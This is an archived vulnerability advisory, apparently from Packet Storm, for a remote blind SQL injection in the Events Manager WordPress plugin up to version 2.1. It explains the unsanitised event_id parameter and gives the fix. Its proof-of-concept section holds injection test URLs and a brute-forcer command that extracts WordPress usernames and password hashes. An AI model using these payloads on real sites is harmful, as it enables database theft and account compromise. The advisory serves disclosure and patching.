Exploit the possiblities

Events Manager Wordpress Plugin 2.1 Blind SQL Injection

Events Manager Wordpress Plugin 2.1 Blind SQL Injection
Posted May 12, 2010
Authored by Danilo Massa

Events Manager Wordpress plugin versions 2.1 and below suffer from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 8566c6175eee457fa12fcfee02c44dca

Events Manager Wordpress Plugin 2.1 Blind SQL Injection

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=============================================
- - Release date: May 10th, 2010
- - Discovered by: Danilo Massa
- - Severity: High
=============================================
I. VULNERABILITY
- -------------------------
Events Manager Wordpress plugin <= 2.1 Blind SQL Injection
II. BACKGROUND
- -------------------------
Events Manager 2.0 is a full-featured event management solution for Wordpress.
Events Manager supports recurring events, locations data, RSVP and maps.
With Events Manager you can plan and publish your tour, or let people reserve
spaces for your weekly meetings.
You can then add events list, calendars and description to your blog using a sidebar
widget or shortcodes; if you’re web designer you can simply employ the template tags
provided by Events Manager.
III. INTRODUCTION
- -------------------------
Events Manager versions 2.0rc2 and 2.1 have a blind sql injection when a single event page is
shown to the users. No authentication required.
IV. DESCRIPTION
- -------------------------
Input passed via the "event_id" parameter to the admin defined event page is not properly
sanitised before being used in a SQL query.
This happen in the events-manager.php file in the following lines (version 2.1):
436: $event_ID = dbem_sanitize_request($_REQUEST ['event_id']);
534: $event_ID = dbem_sanitize_request($_REQUEST ['event_id']);
The dbem_sanitize_request only quote sql reserved characters and do not force event_id parameter
to be an integer number.

V. PROOF OF CONCEPT
- -------------------------
Below is a harmless test that can be executed on the page that show a single event.
http://<wordpress_site>/<event_page>?event_id=<existing_event_id>%20and%201=1
http://<wordpress_site>/<event_page>?event_id=<existing_event_id>%20and%201=0
a more complex test case can be executed using Blind Sql Injection Brute Forcer version 2:
 ./bsqlbf-v2-4.pl -url http://<wordpress_site>/<event_page>?event_id=<existing_event_id> -blind event_id -sql "(SELECT concat(user_login,0x3a,user_pass) from wp_users limit 0,1)" -database 1 -type 0 -match "<string_in_existing_event_web_page>"
getting the first user in the Wordpress database and its password hash.
VI. BUSINESS IMPACT
- -------------------------
An attacker could exploit the vulnerability to retrieve any data from
databases accessible by Wordpress db user.
VII. SYSTEMS AFFECTED
- -------------------------
Versions 2.0rc2 and 2.1 are vulnerable.
Versions <= 2.0rc2 could be vulnerable.
VIII. SOLUTION
- -------------------------
Upgrade to a patched release (>= 2.2) or as quick workaround put a
 settype($event_ID, "int");
just after lines listed in the DESCRIPTION section.
IX. REFERENCES
- -------------------------
http://davidebenini.it/wordpress-plugins/events-manager/
http://davidebenini.it/blog/
X. CREDITS
- -------------------------
The vulnerability has been discovered by Danilo Massa
danilo(under_score)m(at)yahoo(dot)com
XI. VULNERABILITY HISTORY
- -------------------------
April 08th, 2010: Vulnerability identification
April 09th, 2010: Vendor notification
April 10th, 2010: Vendor release an updated version (2.2)
May   10th, 2010: Vulnerability disclosure
XII. LEGAL NOTICES
- -------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this 
information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.14 (MingW32)
iQEcBAEBAgAGBQJL6b61AAoJEIA+zY+H2Pz8QeUH/1XN05uASSiEYn14eTpUBjGC
zSx6+B0c9e4VwcX8Dj5bayK6ibn2FXiaeMtI2ZjFqL8alACtTHVWG3qTn1uDqX78
ShOd8Fxeql0OCw5Fp0ypN6KikLdL6ErxloEM9HpiWZJTksShtHkg8d1gyKpWXdax
ziTCPFtNj1PFLlxQYIdlVT5JtvrxaR/oOZBIXqT/hKrCTLnARpphjj95cU6h539e
NjVFlWMM7UsQceafmlgMD6s5cST9s/hXE6+FdHSWFwM7JGL/cVEyLXWhXWie8Opy
+sFIbWZ/TUG0kT9bhJl/serHsH1cAn649QcpQW38fm+tIpUY0AZqkPuHX3/5AFI=
=xtv1
-----END PGP SIGNATURE-----




Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close